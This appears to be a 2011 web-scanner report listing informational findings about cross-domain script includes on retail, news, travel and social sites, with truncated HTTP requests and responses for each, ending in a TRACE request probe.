HTTP/1.1 200 OK Server: nginx/0.8.52 Date: Sun, 15 May 2011 21:30:45 GMT Content-Type: text/html Connection: keep-alive X-Powered-By: PHP/5.3.4-dev Set-Cookie: cookie_key=2; expires=Sun, 12-Jun-2011 21:30:45 GMT; path=/; domain=.pastebin.com Vary: Accept-Encoding Content-Length: 33124 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="Con ...[SNIP]... </script> <script type="text/javascript" src="http://tags.expo9 ...[SNIP]... </script> <script type="text/javascript" src="http://tags.expo9 ...[SNIP]... </script> <script type="text/javascript" src="http://edge ...[SNIP]... <!-- End comScore Tag --> <script type="text/javascript" src="http://lolbin.net ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://r1-ads.ace |
Path: | /site=786652/size=728090 |
GET /site=786652/size=728090 Host: r1-ads.ace.advertising Proxy-Connection: keep-alive Referer: http://travel.usatoday User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ACID=qw280013054845430029 |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 01:20:10 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Pragma: no-cache P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising Comscore: CMXID=2115.1007584.786652 Set-Cookie: C2=JvH0NFJwHsb0FtfqH Set-Cookie: F1=Bk8eQ3EBAAAABAAAA Set-Cookie: BASE=x7Q9Mi23SwnkpMd Set-Cookie: ROLL=U6APIjeKkzEWubp Set-Cookie: 71920917=_4dd07bc9 Cache-Control: private, max-age=0, no-cache Expires: Mon, 16 May 2011 01:20:10 GMT Content-Type: application/x-javascript; charset=utf-8 Content-Length: 601 document.write('<SCRIPT language=\'JavaScript1.1\ ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://secureshopping |
Path: | / |
GET / HTTP/1.1 Host: secureshopping.mcafee.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: s_vi=[CS]v1|26E73DAF |
HTTP/1.1 200 OK Vary: Accept-Encoding Server: McAfeeSecure Set-Cookie: user=id=1305509541690-1 Content-Type: text/html; charset=utf-8 Content-Length: 42652 Date: Mon, 16 May 2011 01:39:49 GMT <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html> <head> <title>McAfee Secure Shopping - Secure Online Shopping</title> <meta name="d ...[SNIP]... </a> <script type="text/javascript" src="http://s7.addthis ...[SNIP]... </script> <script type="text/javascript" src="http://pagead2 ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://sony.links |
Path: | /pages/prices.asp |
GET /pages/prices.asp?nrgid Host: sony.links.channelin Proxy-Connection: keep-alive Referer: http://us.playstation.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: serverstamp=4B88CCEA-94CF |
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 P3P: CP="OTI DSP COR CURa ADMa DEVa OUR DELa STP" Content-Type: text/html Vary: Accept-Encoding Content-Length: 19529 Cache-Control: public, max-age=1549 Expires: Sun, 15 May 2011 20:52:22 GMT Date: Sun, 15 May 2011 20:26:33 GMT Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... </script> <script type="text/javascript" src="http://www.google ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://travel.usatoday |
Path: | /cruises/post/2011/05 |
GET /cruises/post/2011/05 Host: travel.usatoday.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Vary: Accept-Encoding Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM", POLICYREF="URI" Date: Mon, 16 May 2011 01:19:35 GMT Content-Length: 54487 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org xmlns:pas="http:/ ...[SNIP]... </script> <script type="text/javascript" src="http://s7.addthis ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.cruisecritic |
Path: | /reviews/cruiseline.cfm |
GET /reviews/cruiseline.cfm Host: www.cruisecritic.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 01:26:39 GMT Content-Type: text/html; charset=UTF-8 Content-Language: en-US Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: SUBSCRIBENEWSLETTER=2 Vary: Accept-Encoding Content-Length: 47418 <html> <head> <title>Disney Cruise Line - Disney Cruises and Reviews - Cruise Critic</title> <meta name="description" content="Cruise Critic has 373 Disney cruise ...[SNIP]... ft;sz=728x90;region=;city <script language="JavaScript" src="http://ad.doubl ...[SNIP]... =x81;sz=220x90;region= ...[SNIP]... sney;pos=right1;sz <script language="JavaScript" src="http://ad.doubl ...[SNIP]... sney;pos=right2;sz <script language="JavaScript" src="http://ad.doubl ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.facebook.com |
Path: | /plugins/like.php |
GET /plugins/like.php?action Host: www.facebook.com Proxy-Connection: keep-alive Referer: http://blog.us.plays User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: datr=3GHNTeTln1shCRl |
HTTP/1.1 200 OK Cache-Control: private, no-cache, no-store, must-revalidate Expires: Sat, 01 Jan 2000 00:00:00 GMT Pragma: no-cache Content-Type: text/html; charset=utf-8 X-FB-Server: 10.54.29.50 X-Cnection: close Date: Sun, 15 May 2011 20:27:07 GMT Content-Length: 8508 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... <link type="text/css" rel="stylesheet" href="http://static.ak <script type="text/javascript" src="http://static.ak ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.facebook.com |
Path: | /plugins/likebox.php |
GET /plugins/likebox.php?id Host: www.facebook.com Proxy-Connection: keep-alive Referer: http://www.cruisecritic User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: datr=3GHNTeTln1shCRl |
HTTP/1.1 200 OK Cache-Control: private, no-cache, no-store, must-revalidate Expires: Sat, 01 Jan 2000 00:00:00 GMT Pragma: no-cache Content-Type: text/html; charset=utf-8 X-FB-Server: 10.54.68.45 X-Cnection: close Date: Mon, 16 May 2011 01:28:09 GMT Content-Length: 8915 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... <link type="text/css" rel="stylesheet" href="http://static.ak <script type="text/javascript" src="http://static.ak ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.fingerhut.com |
Path: | / |
GET / HTTP/1.1 Host: www.fingerhut.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: PIPELINE_SESSION_ID |
HTTP/1.1 200 OK Server: Apache Content-Type: text/html;charset=ISO Vary: Accept-Encoding Content-Length: 119735 Date: Mon, 16 May 2011 01:37:34 GMT Connection: close Set-Cookie: JSESSIONID=ACAC16584 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html > <head> <style type="text/css"> body { ...[SNIP]... <div class="homeHero"><script type="text/javascript" src="https://ajax ...[SNIP]... <div style="padding-bottom: 15px; text-align: center;"> <script language="JavaScript" src="https://seal ...[SNIP]... </script> <script type="text/javascript" src="http://e.nexac.com/e ...[SNIP]... <!-- Channel Intelligence TrueTag v1.4 --> <script src="http://cts ...[SNIP]... </script> <script type="text/javascript" src="http://d1nh2vjp ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | https://www.fingerhut.com |
Path: | /user/login.jsp |
GET /user/login.jsp HTTP/1.1 Host: www.fingerhut.com Connection: keep-alive Referer: http://www.fingerhut.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: PIPELINE_SESSION_ID |
HTTP/1.1 200 OK Server: Apache Content-Type: text/html;charset=ISO Vary: Accept-Encoding Content-Length: 83965 Date: Mon, 16 May 2011 01:37:28 GMT Connection: keep-alive Set-Cookie: JSESSIONID=B5C80FAB7 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html > <head> <style type="text/css"> body { ...[SNIP]... <div style="padding-bottom: 15px; text-align: center;"> <script language="JavaScript" src="https://seal ...[SNIP]... </script> <script type="text/javascript" src="https://e.nexac.com ...[SNIP]... <!-- Channel Intelligence TrueTag v1.4 --> <script src="https://cts-secure ...[SNIP]... </script> <script type="text/javascript" src="https://d1nh2vj ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.guitarcenter |
Path: | /Includes/GuitarCenter |
GET /Includes/GuitarCenter Host: www.guitarcenter.com Proxy-Connection: keep-alive Referer: http://www.guitarcenter User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ASP.NET_SessionId |
HTTP/1.1 200 OK Content-Length: 69210 Content-Type: application/x-javascript Last-Modified: Wed, 27 Apr 2011 11:51:54 GMT Accept-Ranges: bytes Vary: Accept-Encoding Server: Microsoft-IIS/6.0 SN: 28 X-Powered-By: ASP.NET Date: Mon, 16 May 2011 01:40:16 GMT function getCookie(name){var arg=name+"=";var alen=arg.length;var clen=document.cookie ...[SNIP]... ug=function(oc,pc,mc) ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.magicalki |
Path: | /blog/category/disneyland |
GET /blog/category/disneyland Host: www.magicalkingdoms.com Proxy-Connection: keep-alive Referer: http://www.magicalki User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: PHPSESSID=cf6190390f |
HTTP/1.1 200 OK Date: Mon, 16 May 2011 01:34:40 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.14 X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache X-Pingback: http://www.magicalki Content-Type: text/html; charset=UTF-8 Content-Length: 59537 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <met ...[SNIP]... <!-- NextGeEN Gallery CoolIris/PicLens support --> <script type="text/javascript" src="http://lite.piclens ...[SNIP]... </script> <script type="text/javascript" src="http://pagead2 ...[SNIP]... </script> <script type="text/javascript" src="http://pagead2 ...[SNIP]... </script> <script type="text/javascript" src="http://pagead2 ...[SNIP]... </script> <script type="text/javascript" src="http://pagead2 ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.mcafeesecure |
Path: | /us/forconsumers/mcafee |
GET /us/forconsumers/mcafee Host: www.mcafeesecure.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmx=185732405.; __utmxx=185732405.; __utmz=185732405 |
HTTP/1.1 200 OK Server: McAfeeSecure Expires: Thu, 01 Jan 1970 00:00:00 GMT Vary: Accept-Encoding Cache-Control: no-cache Content-Type: text/html; charset=utf-8 Content-Length: 70891 Connection: close Date: Mon, 16 May 2011 01:38:51 GMT <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title>Secure T ...[SNIP]... </script>--> <script type="text/javascript" src="//images.scanalert ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | https://www.mcafeesecure |
Path: | /RatingVerify |
GET /RatingVerify?ref=www Host: www.mcafeesecure.com Connection: keep-alive Referer: https://www.fingerhut.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmx=185732405.; __utmxx=185732405.; __utmz=185732405 |
HTTP/1.1 200 OK Server: McAfeeSecure Vary: Accept-Encoding Expires: Thu, 01 Jan 1970 00:00:00 GMT Cache-Control: no-cache Set-Cookie: CAMEFROM=www.fingerhut Content-Type: text/html; charset=utf-8 Content-Length: 10809 Connection: close Date: Mon, 16 May 2011 01:37:34 GMT <html> <head> <!-- Google Website Optimizer Control Script --> <script> function utmx_section(){}function utmx(){} (function(){var k='1568676568',d=document ...[SNIP]... </script> <script language='javascript' src='https://server.iad ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | https://www.mcafeesecure |
Path: | /favicon.ico |
GET /favicon.ico HTTP/1.1 Host: www.mcafeesecure.com Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmx=185732405.; __utmxx=185732405.; __utmz=185732405 |
HTTP/1.1 404 Not Found Server: McAfeeSecure Vary: Accept-Encoding Expires: Thu, 01 Jan 1970 00:00:00 GMT Cache-Control: no-cache Content-Type: text/html; charset=utf-8 Connection: close Date: Mon, 16 May 2011 01:37:34 GMT Content-Length: 9922 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title>Secure ...[SNIP]... </script>--> <script type="text/javascript" src="https://images ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.observertoday |
Path: | /page/content.detail/id |
GET /page/content.detail/id Host: www.observertoday.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 01:19:42 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="Conten ...[SNIP]... a County, New York , Lake Erie, Jamestown Community College, Dunkirk High School, Cattaraugus Reservation, Dunkirk, Fredonia, Sheridan, Hanover, Forestville, Silver Creek, Angola, Portland," /> <script type="text/javascript" src="http://partner </script> ...[SNIP]... </a><script type="text/javascript" src="http://s7.addthis ...[SNIP]... </div> <script src="http://connect ...[SNIP]... </body> <script src="http://www.google ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.siteadvisor |
Path: | /download/windows.html |
GET /download/windows.html Host: www.siteadvisor.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: s_nr=1305377672274-New |
HTTP/1.1 200 OK Date: Mon, 16 May 2011 01:39:27 GMT Server: Apache Content-Type: text/html; charset=utf-8 Content-Length: 40225 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> ...[SNIP]... <div style="padding-top:10px"> <script type="text/javascript" src="http://static.ak ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.sonystyle.com |
Path: | /webapp/wcs/stores |
GET /webapp/wcs/stores Host: www.sonystyle.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.sonystyle.com Cookie: TS5bbf46=7383fa36127 |
HTTP/1.1 200 OK ntCoent-Length: 101653 Content-Type: text/html; charset=ISO-8859-1 Content-Language: en-US Content-Length: 101653 Vary: Accept-Encoding Date: Sun, 15 May 2011 21:20:41 GMT Connection: close Cache-Control: private <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html> <head> <link rel="canonical" href="http://www ...[SNIP]... <!-- AllSitesHeadInclude --> <script type="text/javascript" src="//nexus2.ensighten </script> ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.sonystyle.com |
Path: | /webapp/wcs/stores |
GET /webapp/wcs/stores Host: www.sonystyle.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.sonystyle.com Cookie: TS5bbf46=7383fa36127 |
HTTP/1.1 200 OK ntCoent-Length: 249393 Content-Type: text/html; charset=ISO-8859-1 Content-Language: en-US Vary: Accept-Encoding Date: Sun, 15 May 2011 21:21:24 GMT Connection: close Connection: Transfer-Encoding Cache-Control: private Content-Length: 249393 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <link rel="canonical" href ...[SNIP]... <!-- AllSitesHeadInclude --> <script type="text/javascript" src="//nexus2.ensighten </script> ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.sonystyle.com |
Path: | /webapp/wcs/stores |
GET /webapp/wcs/stores Host: www.sonystyle.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.sonystyle.com Cookie: TS5bbf46=7383fa36127 |
HTTP/1.1 200 OK Cteonnt-Length: 105431 Content-Type: text/html; charset=ISO-8859-1 Content-Language: en-US Content-Length: 105431 Vary: Accept-Encoding Date: Sun, 15 May 2011 21:21:13 GMT Connection: close Set-Cookie: WC_PERSISTENT=CBnCTN Set-Cookie: WC_USERACTIVITY_239700472 Set-Cookie: WC_ACTIVEPOINTER=%2d1 Set-Cookie: WC_USERACTIVITY_239700473 Set-Cookie: TS5bbf46=394e9935c8a Cache-Control: private Expires: Thu, 01 Jan 1970 00:00:00 GMT Pragma: No-cache <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html> <head> <!-- AllSitesHeadInclude --> <script type="text/javascript" src="//nexus2.ensighten </script> ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.sonystyle.com |
Path: | /webapp/wcs/stores |
GET /webapp/wcs/stores Host: www.sonystyle.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Cookie: TS5bbf46=3693d43bbe0 |
HTTP/1.1 200 OK ntCoent-Length: 91771 Content-Type: text/html; charset=ISO-8859-1 Content-Language: en-US Content-Length: 91771 Vary: Accept-Encoding Date: Sun, 15 May 2011 21:19:46 GMT Connection: close Cache-Control: private <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html> <head> <!-- AllSitesHeadInclude --> <script type="text/javascript" src="//nexus2.ensighten </script> ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | https://www.sonystyle.com |
Path: | /webapp/wcs/stores |
GET /webapp/wcs/stores Host: www.sonystyle.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Connection: keep-alive Referer: https://www.sonystyle.com Cookie: TS5bbf46=f5a3eb9e27e |
HTTP/1.1 200 OK ntCoent-Length: 87984 Content-Type: text/html; charset=ISO-8859-1 Content-Language: en-US Content-Length: 87984 Vary: Accept-Encoding Date: Sun, 15 May 2011 21:24:04 GMT Connection: keep-alive Cache-Control: private Expires: Thu, 01 Jan 1970 00:00:00 GMT Pragma: No-cache <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html> <head> <!-- AllSitesHeadInclude --> <script type="text/javascript" src="//nexus2.ensighten </script> ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | https://www.sonystyle.com |
Path: | /webapp/wcs/stores |
GET /webapp/wcs/stores Host: www.sonystyle.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Connection: keep-alive Referer: https://www.sonystyle.com Cookie: TS5bbf46=b8fba18f1f5 |
HTTP/1.1 200 OK Cteonnt-Length: 91796 Content-Type: text/html; charset=ISO-8859-1 Content-Language: en-US Content-Length: 91796 Vary: Accept-Encoding Date: Sun, 15 May 2011 21:22:06 GMT Connection: keep-alive Cache-Control: private <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html> <head> <!-- AllSitesHeadInclude --> <script type="text/javascript" src="//nexus2.ensighten </script> ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.telegraph.co |
Path: | /sponsored/travel/8509794 |
GET /sponsored/travel/8509794 Host: www.telegraph.co.uk Proxy-Connection: keep-alive Referer: http://www.telegraph.co User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=76009744 |
HTTP/1.1 200 OK Server: Apache Content-Type: text/html;charset=ISO ETag: 8509794-1305508644064 Vary: Accept-Encoding Content-Language: en-GB Cache-Control: max-age=307 Date: Mon, 16 May 2011 01:32:56 GMT Content-Length: 47875 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... <link type="text/css" rel="stylesheet" href="http://inskin.vo <script type="text/javascript" src="http://inskin.vo ...[SNIP]... </style> <script src="http://platform ...[SNIP]... </div> <script type="text/javascript" src="http://js.revsci.net ...[SNIP]... </script> <script type="text/javascript" src="http://s7.addthis ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.telegraph.co |
Path: | /sponsored/travel/disney |
GET /sponsored/travel/disney Host: www.telegraph.co.uk Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Server: Apache Content-Type: text/html;charset=ISO ETag: 8509938-1305507621089 Vary: Accept-Encoding Content-Language: en-GB Cache-Control: max-age=83 Date: Mon, 16 May 2011 01:19:33 GMT Content-Length: 44749 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... <link type="text/css" rel="stylesheet" href="http://inskin.vo <script type="text/javascript" src="http://inskin.vo ...[SNIP]... </style> <script src="http://platform ...[SNIP]... </div> <script type="text/javascript" src="http://js.revsci.net ...[SNIP]... </script> <script type="text/javascript" src="http://s7.addthis ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.viddler.com |
Path: | /file/7d63c65a/html5 |
GET /file/7d63c65a/html5 Host: www.viddler.com Proxy-Connection: keep-alive Referer: http://blog.us.plays Accept: */* User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Range: bytes=0- |
HTTP/1.1 500 Internal Server Error Server: nginx/0.6.32 Date: Sun, 15 May 2011 20:26:39 GMT Content-Type: text/html;charset=UTF-8 Connection: keep-alive X-Viddler-Node: viddler_d Vary: Accept-Encoding Content-Length: 7614 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html> <head> <meta http-equiv="Content-Type" content="text/html; c ...[SNIP]... </script> <script type="text/javascript" src="http://edge ...[SNIP]... <!-- Woopra Code Start --> <script type="text/javascript" src="//static.woopra.com ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://ads.pubmatic.com |
Path: | / |
TRACE / HTTP/1.0 Host: ads.pubmatic.com Cookie: 7f1f0508d037feb0 |
